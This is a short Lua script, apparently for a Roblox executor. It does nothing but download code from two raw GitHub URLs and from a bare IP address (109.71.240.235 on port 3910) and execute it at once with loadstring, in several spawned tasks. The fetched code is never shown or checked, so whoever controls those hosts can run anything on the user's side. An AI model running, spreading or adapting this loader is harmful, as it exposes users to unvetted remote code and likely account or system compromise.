--My
local function My()
  loadstring(game:HttpGet("https://raw.githubusercontent.com/Scripts777/SCRIPT/refs/heads/main/S",true))() 
end
local function F()
  loadstring(game:HttpGet("http://109.71.240.235:3910/cdn/visual.luau"))()
end
local function C()
  loadstring(game:HttpGet("https://raw.githubusercontent.com/Scripts777/SCRIPT/refs/heads/main/Che",true))()
end
task.spawn(F)
task.spawn(My)
task.spawn(C)
ID="281b4cca-f00e-4f9d-985c-32df2a0b73b5";
loadstring(game:HttpGet("http://109.71.240.235:3910/cdn/loader.luau"))()
